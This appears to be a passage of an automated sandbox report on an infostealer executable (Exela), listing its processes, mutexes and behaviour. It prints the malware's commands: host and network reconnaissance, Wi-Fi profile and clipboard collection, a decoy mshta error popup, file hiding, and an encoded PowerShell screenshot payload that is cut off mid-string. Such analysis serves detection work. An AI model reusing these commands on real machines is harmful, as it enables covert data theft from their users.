            Source: C:\Users\user\Desktop\rename_me_before.exeCode function: 0_2_00007FF64050518C0_2_00007FF64050518C
            Source: C:\Users\user\Desktop\rename_me_before.exeCode function: 0_2_00007FF6404F91B00_2_00007FF6404F91B0
            Source: C:\Users\user\Desktop\rename_me_before.exeCode function: 0_2_00007FF6404FD2000_2_00007FF6404FD200
            Source: C:\Users\user\Desktop\rename_me_before.exeCode function: 0_2_00007FF6404F12800_2_00007FF6404F1280
            Source: C:\Users\user\Desktop\rename_me_before.exeCode function: 0_2_00007FF6404F7AAC0_2_00007FF6404F7AAC
            Source: C:\Users\user\Desktop\rename_me_before.exeCode function: 0_2_00007FF640508A380_2_00007FF640508A38
            Source: C:\Users\user\Desktop\rename_me_before.exeCode function: 0_2_00007FF6404F0A600_2_00007FF6404F0A60
            Source: C:\Users\user\Desktop\rename_me_before.exeCode function: 0_2_00007FF6404E8B200_2_00007FF6404E8B20
            Source: C:\Users\user\Desktop\rename_me_before.exeCode function: 0_2_00007FF640500B840_2_00007FF640500B84
            Source: C:\Users\user\Desktop\rename_me_before.exeCode function: 0_2_00007FF6405033BC0_2_00007FF6405033BC
            Source: C:\Users\user\Desktop\rename_me_before.exeCode function: 0_2_00007FF6404F73F40_2_00007FF6404F73F4
            Source: C:\Users\user\Desktop\rename_me_before.exeCode function: 0_2_00007FF6404F14840_2_00007FF6404F1484
            Source: C:\Users\user\Desktop\rename_me_before.exeCode function: 0_2_00007FF6404F0C640_2_00007FF6404F0C64
            Source: C:\Users\user\Desktop\rename_me_before.exeCode function: 0_2_00007FF6404F2CC40_2_00007FF6404F2CC4
            Source: C:\Users\user\Desktop\rename_me_before.exeCode function: 0_2_00007FF6404FCD6C0_2_00007FF6404FCD6C
            Source: C:\Users\user\Desktop\rename_me_before.exeCode function: 0_2_00007FF6404E95FB0_2_00007FF6404E95FB
            Source: C:\Users\user\Desktop\rename_me_before.exeCode function: 0_2_00007FF6404F0E700_2_00007FF6404F0E70
            Source: C:\Users\user\Desktop\rename_me_before.exeCode function: 0_2_00007FF6404F1F300_2_00007FF6404F1F30
            Source: C:\Users\user\Desktop\rename_me_before.exeCode function: 0_2_00007FF6404FFBD80_2_00007FF6404FFBD8
            Source: C:\Users\user\Desktop\rename_me_before.exeCode function: 0_2_00007FF6405057280_2_00007FF640505728
            Source: C:\Users\user\Desktop\rename_me_before.exeCode function: 0_2_00007FF640502F200_2_00007FF640502F20
            Source: C:\Users\user\Desktop\rename_me_before.exeCode function: 0_2_00007FF6404E979B0_2_00007FF6404E979B
            Source: C:\Users\user\Desktop\rename_me_before.exeCode function: 0_2_00007FF6404E9FCD0_2_00007FF6404E9FCD
            Source: C:\Users\user\Desktop\rename_me_before.exeCode function: 0_2_00007FF6404FD8800_2_00007FF6404FD880
            Source: C:\Users\user\Desktop\rename_me_before.exeCode function: 0_2_00007FF6404F50400_2_00007FF6404F5040
            Source: C:\Users\user\Desktop\rename_me_before.exeCode function: 0_2_00007FF6404F10740_2_00007FF6404F1074
            Source: C:\Users\user\Desktop\rename_me_before.exeCode function: 0_2_00007FF6404F28C00_2_00007FF6404F28C0
            Source: C:\Users\user\Desktop\rename_me_before.exeCode function: 1_2_00007FF640505C741_2_00007FF640505C74
            Source: C:\Users\user\Desktop\rename_me_before.exeCode function: 1_2_00007FF6404E95FB1_2_00007FF6404E95FB
            Source: C:\Users\user\Desktop\rename_me_before.exeCode function: 1_2_00007FF6404E10001_2_00007FF6404E1000
            Source: C:\Users\user\Desktop\rename_me_before.exeCode function: 1_2_00007FF64050518C1_2_00007FF64050518C
            Source: C:\Users\user\Desktop\rename_me_before.exeCode function: 1_2_00007FF6404F91B01_2_00007FF6404F91B0
            Source: C:\Users\user\Desktop\rename_me_before.exeCode function: 1_2_00007FF6404FD2001_2_00007FF6404FD200
            Source: C:\Users\user\Desktop\rename_me_before.exeCode function: 1_2_00007FF6404F12801_2_00007FF6404F1280
            Source: C:\Users\user\Desktop\rename_me_before.exeCode function: 1_2_00007FF6404F7AAC1_2_00007FF6404F7AAC
            Source: C:\Users\user\Desktop\rename_me_before.exeCode function: 1_2_00007FF640508A381_2_00007FF640508A38
            Source: C:\Users\user\Desktop\rename_me_before.exeCode function: 1_2_00007FF6404F0A601_2_00007FF6404F0A60
            Source: C:\Users\user\Desktop\rename_me_before.exeCode function: 1_2_00007FF6404E8B201_2_00007FF6404E8B20
            Source: C:\Users\user\Desktop\rename_me_before.exeCode function: 1_2_00007FF640500B841_2_00007FF640500B84
            Source: C:\Users\user\Desktop\rename_me_before.exeCode function: 1_2_00007FF6405033BC1_2_00007FF6405033BC
            Source: C:\Users\user\Desktop\rename_me_before.exeCode function: 1_2_00007FF6404F73F41_2_00007FF6404F73F4
            Source: C:\Users\user\Desktop\rename_me_before.exeCode function: 1_2_00007FF6404FFBD81_2_00007FF6404FFBD8
            Source: C:\Users\user\Desktop\rename_me_before.exeCode function: 1_2_00007FF6404F14841_2_00007FF6404F1484
            Source: C:\Users\user\Desktop\rename_me_before.exeCode function: 1_2_00007FF6404F0C641_2_00007FF6404F0C64
            Source: C:\Users\user\Desktop\rename_me_before.exeCode function: 1_2_00007FF6404F2CC41_2_00007FF6404F2CC4
            Source: C:\Users\user\Desktop\rename_me_before.exeCode function: 1_2_00007FF6404FCD6C1_2_00007FF6404FCD6C
            Source: C:\Users\user\Desktop\rename_me_before.exeCode function: 1_2_00007FF6404F0E701_2_00007FF6404F0E70
            Source: C:\Users\user\Desktop\rename_me_before.exeCode function: 1_2_00007FF640504F101_2_00007FF640504F10
            Source: C:\Users\user\Desktop\rename_me_before.exeCode function: 1_2_00007FF6404F1F301_2_00007FF6404F1F30
            Source: C:\Users\user\Desktop\rename_me_before.exeCode function: 1_2_00007FF6404FFBD81_2_00007FF6404FFBD8
            Source: C:\Users\user\Desktop\rename_me_before.exeCode function: 1_2_00007FF6405057281_2_00007FF640505728
            Source: C:\Users\user\Desktop\rename_me_before.exeCode function: 1_2_00007FF640502F201_2_00007FF640502F20
            Source: C:\Users\user\Desktop\rename_me_before.exeCode function: 1_2_00007FF6404E979B1_2_00007FF6404E979B
            Source: C:\Users\user\Desktop\rename_me_before.exeCode function: 1_2_00007FF6404E9FCD1_2_00007FF6404E9FCD
            Source: C:\Users\user\Desktop\rename_me_before.exeCode function: 1_2_00007FF6404FD8801_2_00007FF6404FD880
            Source: C:\Users\user\Desktop\rename_me_before.exeCode function: 1_2_00007FF6404F50401_2_00007FF6404F5040
            Source: C:\Users\user\Desktop\rename_me_before.exeCode function: 1_2_00007FF6404F10741_2_00007FF6404F1074
            Source: C:\Users\user\Desktop\rename_me_before.exeCode function: 1_2_00007FF6404F28C01_2_00007FF6404F28C0
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 69_2_00007FFD99E2169969_2_00007FFD99E21699
            Source: C:\Users\user\Desktop\rename_me_before.exeCode function: String function: 00007FF6404E2760 appears 36 times
            Source: C:\Users\user\Desktop\rename_me_before.exeCode function: String function: 00007FF6404E25F0 appears 100 times
            Source: _overlapped.pyd.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
            Source: unicodedata.pyd.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
            Source: python3.dll.0.drStatic PE information: No import functions for PE file found
            Source: rename_me_before.exeBinary or memory string: OriginalFilename vs rename_me_before.exe
            Source: rename_me_before.exe, 00000000.00000003.1660090231.000001CF0A290000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs rename_me_before.exe
            Source: rename_me_before.exe, 00000000.00000000.1659094858.00007FF640526000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameExela.exej% vs rename_me_before.exe
            Source: rename_me_before.exe, 00000000.00000003.1659883292.000001CF0A290000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_decimal.pyd. vs rename_me_before.exe
            Source: rename_me_before.exe, 00000000.00000003.1660201204.000001CF0A290000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_multiprocessing.pyd. vs rename_me_before.exe
            Source: rename_me_before.exe, 00000000.00000003.1659578842.000001CF0A290000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs rename_me_before.exe
            Source: rename_me_before.exe, 00000000.00000003.1659342426.000001CF0A290000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs rename_me_before.exe
            Source: rename_me_before.exe, 00000000.00000003.1660419536.000001CF0A290000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_socket.pyd. vs rename_me_before.exe
            Source: rename_me_before.exe, 00000000.00000003.1664519798.000001CF0A292000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepython3.dll. vs rename_me_before.exe
            Source: rename_me_before.exe, 00000000.00000003.1660337628.000001CF0A290000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_queue.pyd. vs rename_me_before.exe
            Source: rename_me_before.exe, 00000000.00000003.1665033883.000001CF0A292000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameselect.pyd. vs rename_me_before.exe
            Source: rename_me_before.exe, 00000000.00000003.1665318433.000001CF0A292000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameunicodedata.pyd. vs rename_me_before.exe
            Source: rename_me_before.exe, 00000000.00000003.1660005362.000001CF0A290000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_hashlib.pyd. vs rename_me_before.exe
            Source: rename_me_before.exe, 00000000.00000003.1659482389.000001CF0A290000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_asyncio.pyd. vs rename_me_before.exe
            Source: rename_me_before.exe, 00000000.00000003.1665125906.000001CF0A292000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesqlite3.dll0 vs rename_me_before.exe
            Source: rename_me_before.exe, 00000000.00000003.1663988255.000001CF0A292000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibsslH vs rename_me_before.exe
            Source: rename_me_before.exe, 00000000.00000003.1659790847.000001CF0A290000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ctypes.pyd. vs rename_me_before.exe
            Source: rename_me_before.exe, 00000000.00000003.1661117895.000001CF0A290000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_uuid.pyd. vs rename_me_before.exe
            Source: rename_me_before.exe, 00000000.00000003.1660274517.000001CF0A290000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_overlapped.pyd. vs rename_me_before.exe
            Source: rename_me_before.exe, 00000000.00000003.1664424670.000001CF0A292000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepyexpat.pyd. vs rename_me_before.exe
            Source: rename_me_before.exe, 00000000.00000003.1660916713.000001CF0A290000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_sqlite3.pyd. vs rename_me_before.exe
            Source: rename_me_before.exe, 00000000.00000003.1661025344.000001CF0A290000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ssl.pyd. vs rename_me_before.exe
            Source: rename_me_before.exeBinary or memory string: OriginalFilename vs rename_me_before.exe
            Source: rename_me_before.exe, 00000001.00000002.1981233285.000001B17FDC0000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: OriginalFilenamepython3.dll. vs rename_me_before.exe
            Source: rename_me_before.exe, 00000001.00000000.1666086180.00007FF640526000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameExela.exej% vs rename_me_before.exe
            Source: rename_me_before.exeBinary or memory string: OriginalFilenameExela.exej% vs rename_me_before.exe
            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeProcess created: Commandline size = 3647
            Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3615
            Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3615
            Source: libcrypto-3.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9989650991958289
            Source: libssl-3.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9923451741536459
            Source: python311.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9992887181541107
            Source: sqlite3.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9971625026106934
            Source: unicodedata.pyd.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9942873714221825
            Source: system_info.txt.1.drBinary string: Boot Device: \Device\HarddiskVolume1
            Source: classification engineClassification label: mal100.rans.spre.phis.troj.spyw.expl.evad.winEXE@130/182@4/6
            Source: C:\Users\user\Desktop\rename_me_before.exeCode function: 0_2_00007FF6404E29E0 GetLastError,FormatMessageW,MessageBoxW,0_2_00007FF6404E29E0
            Source: C:\Users\user\Desktop\rename_me_before.exeFile created: C:\Users\user\AppData\Local\ExelaUpdateService\Jump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7264:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7272:120:WilError_03
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2200:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2084:120:WilError_03
            Source: C:\Users\user\Desktop\rename_me_before.exeMutant created: \Sessions\1\BaseNamedObjects\E
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6812:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6316:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7036:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8172:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5228:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6792:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4564:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1072:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5216:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2004:120:WilError_03
            Source: C:\Users\user\Desktop\rename_me_before.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI13962Jump to behavior
            Source: rename_me_before.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
            Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
            Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
            Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
            Source: C:\Users\user\Desktop\rename_me_before.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Windows\System32\cmd.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: rename_me_before.exeVirustotal: Detection: 67%
            Source: rename_me_before.exeReversingLabs: Detection: 50%
            Source: C:\Users\user\Desktop\rename_me_before.exeFile read: C:\Users\user\Desktop\rename_me_before.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\rename_me_before.exe "C:\Users\user\Desktop\rename_me_before.exe"
            Source: C:\Users\user\Desktop\rename_me_before.exeProcess created: C:\Users\user\Desktop\rename_me_before.exe "C:\Users\user\Desktop\rename_me_before.exe"
            Source: C:\Users\user\Desktop\rename_me_before.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\rename_me_before.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
            Source: C:\Users\user\Desktop\rename_me_before.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
            Source: C:\Users\user\Desktop\rename_me_before.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe""
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe"
            Source: C:\Users\user\Desktop\rename_me_before.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()""
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\rename_me_before.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
            Source: C:\Users\user\Desktop\rename_me_before.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
            Source: C:\Users\user\Desktop\rename_me_before.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\rename_me_before.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\rename_me_before.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c chcp
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Get-Clipboard
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp
            Source: C:\Users\user\Desktop\rename_me_before.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
            Source: C:\Users\user\Desktop\rename_me_before.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
            Source: C:\Windows\System32\systeminfo.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\HOSTNAME.EXE hostname
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic logicaldisk get caption,description,providername
            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net user
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\query.exe query user
            Source: C:\Windows\System32\query.exeProcess created: C:\Windows\System32\quser.exe "C:\Windows\system32\quser.exe"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net localgroup
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 localgroup
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net localgroup administrators
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 localgroup administrators
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net user guest
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user guest
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net user administrator
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user administrator
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic startup get caption,command
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /svc
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /all
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ROUTE.EXE route print
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ARP.EXE arp -a
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\NETSTAT.EXE netstat -ano
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc query type= service state= all
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall show state
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall show config
            Source: C:\Users\user\Desktop\rename_me_before.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
            Source: C:\Users\user\Desktop\rename_me_before.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAG